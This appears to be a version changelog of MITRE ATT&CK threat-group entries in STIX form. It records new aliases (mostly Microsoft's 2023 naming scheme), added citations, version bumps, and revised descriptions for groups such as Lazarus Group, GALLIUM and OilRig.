iterable_item_added
STIX FieldOld valueNew Value
aliasesZigzag Hail
external_references{'source_name': 'Zigzag Hail', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0035] Dragonfly

Current version: 4.0

Version changed from: 3.2 → 4.0

Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-01 02:45:48.973000+00:002024-01-08 20:40:31.822000+00:00
x_mitre_version3.24.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesGhost Blizzard
aliasesBROMINE
external_references{'source_name': 'Ghost Blizzard', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'BROMINE', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G1006] Earth Lusca

Current version: 2.0

Version changed from: 1.0 → 2.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-17 19:51:56.531000+00:002024-04-10 21:38:24.226000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.02.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesCharcoal Typhoon
aliasesCHROMIUM
aliasesControlX
external_references{'source_name': 'Charcoal Typhoon', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'ControlX', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'CHROMIUM', 'description': '(Citation: Microsoft Threat Actor Naming July 2023) (Citation: Recorded Future RedHotel August 2023)'}
external_references{'source_name': 'Recorded Future RedHotel August 2023', 'description': 'Insikt Group. (2023, August 8). RedHotel: A Prolific, Chinese State-Sponsored Group Operating at a Global Scale. Retrieved March 11, 2024.', 'url': 'https://go.recordedfuture.com/hubfs/reports/cta-2023-0808.pdf'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0037] FIN6

Current version: 4.0

Version changed from: 3.3 → 4.0

Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-22 03:50:17.471000+00:002024-01-08 22:13:27.588000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version3.34.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesTAAL
aliasesCamouflage Tempest
external_references{'source_name': 'TAAL', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Camouflage Tempest', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0046] FIN7

Current version: 4.0

Version changed from: 3.0 → 4.0

Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-04 18:10:49.054000+00:002024-04-17 22:09:41.004000+00:00
x_mitre_version3.04.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesELBRUS
aliasesSangria Tempest
external_references{'source_name': 'ELBRUS', 'description': '(Citation: Microsoft Ransomware as a Service)'}
external_references{'source_name': 'Sangria Tempest', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}
external_references{'source_name': 'Microsoft Ransomware as a Service', 'description': 'Microsoft. (2022, May 9). Ransomware as a service: Understanding the cybercrime gig economy and how to protect yourself. Retrieved March 10, 2023.', 'url': 'https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/'}

[G0117] Fox Kitten

Current version: 2.0

Version changed from: 1.1 → 2.0

Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-22 03:53:37.888000+00:002024-01-08 22:00:34.410000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.12.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesRUBIDIUM
aliasesLemon Sandstorm
external_references{'source_name': 'RUBIDIUM', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Lemon Sandstorm', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references{'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0093] GALLIUM

Current version: 4.0

Version changed from: 3.0 → 4.0


Old Description
[GALLIUM](https://attack.mitre.org/groups/G0093) is a cyberespionage group that has been active since at least 2012, primarily targeting telecommunications companies, financial institutions, and government entities in Afghanistan, Australia, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, Russia, and Vietnam. Security researchers have identified [GALLIUM](https://attack.mitre.org/groups/G0093) as a likely Chinese state-sponsored group, based in part on tools used and TTPs commonly associated with Chinese threat actors.(Citation: Cybereason Soft Cell June 2019)(Citation: Microsoft GALLIUM December 2019)(Citation: Unit 42 PingPull Jun 2022)

New Description
[GALLIUM](https://attack.mitre.org/groups/G0093) is a cyberespionage group that has been active since at least 2012, primarily targeting telecommunications companies, financial institutions, and government entities in Afghanistan, Australia, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, Russia, and Vietnam. This group is particularly known for launching Operation Soft Cell, a long-term campaign targeting telecommunications providers.(Citation: Cybereason Soft Cell June 2019) Security researchers have identified [GALLIUM](https://attack.mitre.org/groups/G0093) as a likely Chinese state-sponsored group, based in part on tools used and TTPs commonly associated with Chinese threat actors.(Citation: Cybereason Soft Cell June 2019)(Citation: Microsoft GALLIUM December 2019)(Citation: Unit 42 PingPull Jun 2022)

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-08-12 21:26:22.303000+00:00 | 2024-04-17 22:10:27.139000+00:00
description | [GALLIUM](https://attack.mitre.org/groups/G0093) is a cyberespionage group that has been active since at least 2012, primarily targeting telecommunications companies, financial institutions, and government entities in Afghanistan, Australia, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, Russia, and Vietnam. Security researchers have identified [GALLIUM](https://attack.mitre.org/groups/G0093) as a likely Chinese state-sponsored group, based in part on tools used and TTPs commonly associated with Chinese threat actors.(Citation: Cybereason Soft Cell June 2019)(Citation: Microsoft GALLIUM December 2019)(Citation: Unit 42 PingPull Jun 2022) | [GALLIUM](https://attack.mitre.org/groups/G0093) is a cyberespionage group that has been active since at least 2012, primarily targeting telecommunications companies, financial institutions, and government entities in Afghanistan, Australia, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, Russia, and Vietnam. This group is particularly known for launching Operation Soft Cell, a long-term campaign targeting telecommunications providers.(Citation: Cybereason Soft Cell June 2019) Security researchers have identified [GALLIUM](https://attack.mitre.org/groups/G0093) as a likely Chinese state-sponsored group, based in part on tools used and TTPs commonly associated with Chinese threat actors.(Citation: Cybereason Soft Cell June 2019)(Citation: Microsoft GALLIUM December 2019)(Citation: Unit 42 PingPull Jun 2022)
external_references[1]['source_name'] | Operation Soft Cell | Granite Typhoon
external_references[1]['description'] | (Citation: Cybereason Soft Cell June 2019) | (Citation: Microsoft Threat Actor Naming July 2023)
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 3.0 | 4.0
aliases[1] | Operation Soft Cell | Granite Typhoon
iterable_item_added
STIX Field | Old value | New Value
external_references | | {'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0047] Gamaredon Group

Current version: 3.0

Version changed from: 2.1 → 3.0

Details
values_changed
STIX Field | Old value | New Value
modified | 2023-03-22 04:29:39.915000+00:00 | 2023-12-04 18:11:02.073000+00:00
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 2.1 | 3.0
iterable_item_added
STIX Field | Old value | New Value
aliases | | Aqua Blizzard
external_references | | {'source_name': 'Aqua Blizzard', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references | | {'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0125] HAFNIUM

Current version: 2.0

Version changed from: 1.3 → 2.0

Details
values_changed
STIX Field | Old value | New Value
modified | 2023-04-10 21:54:46.756000+00:00 | 2024-01-08 20:45:37.568000+00:00
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 1.3 | 2.0
iterable_item_added
STIX Field | Old value | New Value
aliases | | Silk Typhoon
external_references | | {'source_name': 'Silk Typhoon', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references | | {'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0119] Indrik Spider

Current version: 4.0

Version changed from: 3.0 → 4.0

Details
values_changed
STIX Field | Old value | New Value
modified | 2023-08-03 21:39:36.666000+00:00 | 2024-04-17 22:10:56.266000+00:00
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 3.0 | 4.0
iterable_item_added
STIX Field | Old value | New Value
aliases | | Manatee Tempest
aliases | | DEV-0243
external_references | | {'source_name': 'Manatee Tempest', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references | | {'source_name': 'DEV-0243', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references | | {'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0004] Ke3chang

Current version: 3.0

Version changed from: 2.0 → 3.0

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-07-22 18:52:32.762000+00:00 | 2024-01-08 21:47:14.257000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 2.0 | 3.0
iterable_item_added
STIX Field | Old value | New Value
aliases | | Nylon Typhoon
external_references | | {'source_name': 'Nylon Typhoon', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references | | {'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0094] Kimsuky

Current version: 4.0

Version changed from: 3.1 → 4.0

Details
values_changed
STIX Field | Old value | New Value
modified | 2023-09-27 20:08:25.814000+00:00 | 2024-04-17 22:11:50.321000+00:00
external_references[1]['source_name'] | Thallium | THALLIUM
external_references[3]['source_name'] | STOLEN PENCIL | Emerald Sleet
external_references[3]['description'] | (Citation: Netscout Stolen Pencil Dec 2018) | (Citation: Microsoft Threat Actor Naming July 2023)
x_mitre_version | 3.1 | 4.0
iterable_item_added
STIX Field | Old value | New Value
aliases | | Emerald Sleet
aliases | | THALLIUM
external_references | | {'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}
iterable_item_removed
STIX Field | Old value | New Value
aliases | STOLEN PENCIL |
aliases | Thallium |

[G1004] LAPSUS$

Current version: 2.0

Version changed from: 1.2 → 2.0

Details
values_changed
STIX Field | Old value | New Value
modified | 2023-10-20 17:06:10.335000+00:00 | 2024-01-11 21:51:11.405000+00:00
x_mitre_version | 1.2 | 2.0
iterable_item_added
STIX Field | Old value | New Value
aliases | | Strawberry Tempest
external_references | | {'source_name': 'Strawberry Tempest', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references | | {'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0032] Lazarus Group

Current version: 4.0

Version changed from: 3.2 → 4.0


Old Description
[Lazarus Group](https://attack.mitre.org/groups/G0032) is a North Korean state-sponsored cyber threat group that has been attributed to the Reconnaissance General Bureau.(Citation: US-CERT HIDDEN COBRA June 2017)(Citation: Treasury North Korean Cyber Groups September 2019) The group has been active since at least 2009 and was reportedly responsible for the November 2014 destructive wiper attack against Sony Pictures Entertainment as part of a campaign named Operation Blockbuster by Novetta. Malware used by [Lazarus Group](https://attack.mitre.org/groups/G0032) correlates to other reported campaigns, including Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain. (Citation: Novetta Blockbuster) North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups, such as [Andariel](https://attack.mitre.org/groups/G0138), [APT37](https://attack.mitre.org/groups/G0067), [APT38](https://attack.mitre.org/groups/G0082), and [Kimsuky](https://attack.mitre.org/groups/G0094).

New Description
[Lazarus Group](https://attack.mitre.org/groups/G0032) is a North Korean state-sponsored cyber threat group that has been attributed to the Reconnaissance General Bureau.(Citation: US-CERT HIDDEN COBRA June 2017)(Citation: Treasury North Korean Cyber Groups September 2019) The group has been active since at least 2009 and was reportedly responsible for the November 2014 destructive wiper attack against Sony Pictures Entertainment as part of a campaign named Operation Blockbuster by Novetta. Malware used by [Lazarus Group](https://attack.mitre.org/groups/G0032) correlates to other reported campaigns, including Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain.(Citation: Novetta Blockbuster) North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups, such as [Andariel](https://attack.mitre.org/groups/G0138), [APT37](https://attack.mitre.org/groups/G0067), [APT38](https://attack.mitre.org/groups/G0082), and [Kimsuky](https://attack.mitre.org/groups/G0094).

Details
values_changed
STIX Field | Old value | New Value
modified | 2023-03-30 19:01:41.451000+00:00 | 2024-04-11 16:06:34.699000+00:00
description | [Lazarus Group](https://attack.mitre.org/groups/G0032) is a North Korean state-sponsored cyber threat group that has been attributed to the Reconnaissance General Bureau.(Citation: US-CERT HIDDEN COBRA June 2017)(Citation: Treasury North Korean Cyber Groups September 2019) The group has been active since at least 2009 and was reportedly responsible for the November 2014 destructive wiper attack against Sony Pictures Entertainment as part of a campaign named Operation Blockbuster by Novetta. Malware used by [Lazarus Group](https://attack.mitre.org/groups/G0032) correlates to other reported campaigns, including Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain. (Citation: Novetta Blockbuster) North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups, such as [Andariel](https://attack.mitre.org/groups/G0138), [APT37](https://attack.mitre.org/groups/G0067), [APT38](https://attack.mitre.org/groups/G0082), and [Kimsuky](https://attack.mitre.org/groups/G0094). | [Lazarus Group](https://attack.mitre.org/groups/G0032) is a North Korean state-sponsored cyber threat group that has been attributed to the Reconnaissance General Bureau.(Citation: US-CERT HIDDEN COBRA June 2017)(Citation: Treasury North Korean Cyber Groups September 2019) The group has been active since at least 2009 and was reportedly responsible for the November 2014 destructive wiper attack against Sony Pictures Entertainment as part of a campaign named Operation Blockbuster by Novetta. Malware used by [Lazarus Group](https://attack.mitre.org/groups/G0032) correlates to other reported campaigns, including Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain.(Citation: Novetta Blockbuster) North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups, such as [Andariel](https://attack.mitre.org/groups/G0138), [APT37](https://attack.mitre.org/groups/G0067), [APT38](https://attack.mitre.org/groups/G0082), and [Kimsuky](https://attack.mitre.org/groups/G0094).
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 3.2 | 4.0
x_mitre_contributors[1] | Dragos Threat Intelligence | Dragos Threat Intelligence
iterable_item_added
STIX Field | Old value | New Value
aliases | | Diamond Sleet
external_references | | {'source_name': 'Diamond Sleet', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references | | {'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0065] Leviathan

Current version: 4.0

Version changed from: 3.0 → 4.0

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-15 15:15:51.198000+00:00 | 2024-01-08 20:33:16.460000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 3.0 | 4.0
iterable_item_added
STIX Field | Old value | New Value
aliases | | Gingham Typhoon
external_references | | {'source_name': 'Gingham Typhoon', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references | | {'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0030] Lotus Blossom

Current version: 3.0

Version changed from: 2.0 → 3.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_attack_spec_version | | 3.2.0
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2019-03-25 14:17:43.218000+00:00 | 2024-01-08 21:58:31.089000+00:00
x_mitre_version | 2.0 | 3.0
iterable_item_added
STIX Field | Old value | New Value
aliases | | RADIUM
aliases | | Raspberry Typhoon
external_references | | {'source_name': 'RADIUM', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references | | {'source_name': 'Raspberry Typhoon', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references | | {'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0059] Magic Hound

Current version: 6.0

Version changed from: 5.2 → 6.0

Details
values_changed
STIX Field | Old value | New Value
modified | 2023-09-11 20:43:14.739000+00:00 | 2024-01-08 21:54:31.501000+00:00
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 5.2 | 6.0
iterable_item_added
STIX Field | Old value | New Value
aliases | | Mint Sandstorm
external_references | | {'source_name': 'Mint Sandstorm', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references | | {'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G1009] Moses Staff

Current version: 2.0

Version changed from: 1.0 → 2.0

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-10-24 18:50:12.653000+00:00 | 2024-04-11 00:39:25.190000+00:00
x_mitre_attack_spec_version | 3.0.0 | 3.2.0
x_mitre_version | 1.0 | 2.0
iterable_item_added
STIX Field | Old value | New Value
aliases | | DEV-0500
aliases | | Marigold Sandstorm
external_references | | {'source_name': 'DEV-0500', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references | | {'source_name': 'Marigold Sandstorm', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references | | {'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0069] MuddyWater

Current version: 5.0

Version changed from: 4.1 → 5.0

Details
values_changed
STIX Field | Old value | New Value
modified | 2023-03-22 04:59:16.032000+00:00 | 2024-04-17 16:48:06.958000+00:00
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 4.1 | 5.0
iterable_item_added
STIX Field | Old value | New Value
aliases | | Mango Sandstorm
aliases | | TA450
external_references | | {'source_name': 'Mango Sandstorm', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references | | {'source_name': 'TA450', 'description': '(Citation: Proofpoint TA450 Phishing March 2024)'}
external_references | | {'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}
external_references | | {'source_name': 'Proofpoint TA450 Phishing March 2024', 'description': 'Miller, J. et al. (2024, March 21). Security Brief: TA450 Uses Embedded Links in PDF Attachments in Latest Campaign. Retrieved March 27, 2024.', 'url': 'https://www.proofpoint.com/us/blog/threat-insight/security-brief-ta450-uses-embedded-links-pdf-attachments-latest-campaign'}

[G0049] OilRig

Current version: 4.0

Version changed from: 3.1 → 4.0


Old Description
[OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.(Citation: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Jan 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)(Citation: Unit42 OilRig Playbook 2023)(Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018)

New Description
[OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. The group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.(Citation: FireEye APT34 Dec 2017)(Citation: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Jan 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)(Citation: Unit42 OilRig Playbook 2023)(Citation: Unit 42 QUADAGENT July 2018)

Details
values_changed
STIX Field | Old value | New Value
modified | 2023-02-06 20:58:52.317000+00:00 | 2024-04-11 16:06:34.698000+00:00
description | [OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.(Citation: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Jan 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)(Citation: Unit42 OilRig Playbook 2023)(Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018) | [OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. The group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.(Citation: FireEye APT34 Dec 2017)(Citation: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Jan 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)(Citation: Unit42 OilRig Playbook 2023)(Citation: Unit 42 QUADAGENT July 2018)
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 3.1 | 4.0
x_mitre_contributors[2] | Dragos Threat Intelligence | Dragos Threat Intelligence
iterable_item_added
STIX Field | Old value | New Value
aliases | | Hazel Sandstorm
aliases | | EUROPIUM
external_references | | {'source_name': 'Hazel Sandstorm', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references | | {'source_name': 'EUROPIUM', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references | | {'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0071] Orangeworm

Current version: 2.0

Version changed from: 1.1 → 2.0


Old Description
[Orangeworm](https://attack.mitre.org/groups/G0071) is a group that has targeted organizations in the healthcare sector in the United States, Europe, and Asia since at least 2015, likely for the purpose of corporate espionage.(Citation: Symantec Orangeworm April 2018)

New Description
[Orangeworm](https://attack.mitre.org/groups/G0071) is a group that has targeted organizations in the healthcare sector in the United States, Europe, and Asia since at least 2015, likely for the purpose of corporate espionage.(Citation: Symantec Orangeworm April 2018) Reverse engineering of [Kwampirs](https://attack.mitre.org/software/S0236), directly associated with [Orangeworm](https://attack.mitre.org/groups/G0071) activity, indicates significant functional and development overlaps with [Shamoon](https://attack.mitre.org/software/S0140).(Citation: Cylera Kwampirs 2022)

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_attack_spec_version | | 3.2.0
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2021-10-26 22:29:09.327000+00:00 | 2024-04-10 21:33:28.444000+00:00
description | [Orangeworm](https://attack.mitre.org/groups/G0071) is a group that has targeted organizations in the healthcare sector in the United States, Europe, and Asia since at least 2015, likely for the purpose of corporate espionage.(Citation: Symantec Orangeworm April 2018) | [Orangeworm](https://attack.mitre.org/groups/G0071) is a group that has targeted organizations in the healthcare sector in the United States, Europe, and Asia since at least 2015, likely for the purpose of corporate espionage.(Citation: Symantec Orangeworm April 2018) Reverse engineering of [Kwampirs](https://attack.mitre.org/software/S0236), directly associated with [Orangeworm](https://attack.mitre.org/groups/G0071) activity, indicates significant functional and development overlaps with [Shamoon](https://attack.mitre.org/software/S0140).(Citation: Cylera Kwampirs 2022)
x_mitre_version | 1.1 | 2.0
iterable_item_added
STIX Field | Old value | New Value
external_references | | {'source_name': 'Cylera Kwampirs 2022', 'description': 'Pablo Rincón Crespo. (2022, January). The link between Kwampirs (Orangeworm) and Shamoon APTs. Retrieved February 8, 2024.', 'url': 'https://resources.cylera.com/hubfs/Cylera%20Labs/Cylera%20Labs%20Kwampirs%20Shamoon%20Technical%20Report.pdf'}

[G1005] POLONIUM

Current version: 2.0

Version changed from: 1.0 → 2.0

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-08-10 12:31:10.192000+00:00 | 2024-01-08 21:56:22.594000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 1.0 | 2.0
iterable_item_added
STIX Field | Old value | New Value
aliases | | Plaid Rain
external_references | | {'source_name': 'Plaid Rain', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
external_references | | {'source_name': 'Microsoft Threat Actor Naming July 2023', 'description': 'Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.', 'url': 'https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide'}

[G0034] Sandworm Team

Current version: 4.0

Version changed from: 3.1 → 4.0

Details
values_changed
STIX Field | Old value | New Value
modified | 2023-10-06 14:13:06.011000+00:00 | 2024-04-06 19:05:38.712000+00:00
x_mitre_version | 3.1 | 4.0
iterable_item_added
STIX Field | Old value | New Value
aliases | | Seashell Blizzard
aliases | | FROZENBARENTS
external_references | | {'source_name': 'FROZENBARENTS', 'description': '(Citation: Leonard TAG 2023)'}
external_references | | {'source_name': 'Seashell Blizzard', 'description': '(Citation: Microsoft Threat Actor Naming July 2023)'}
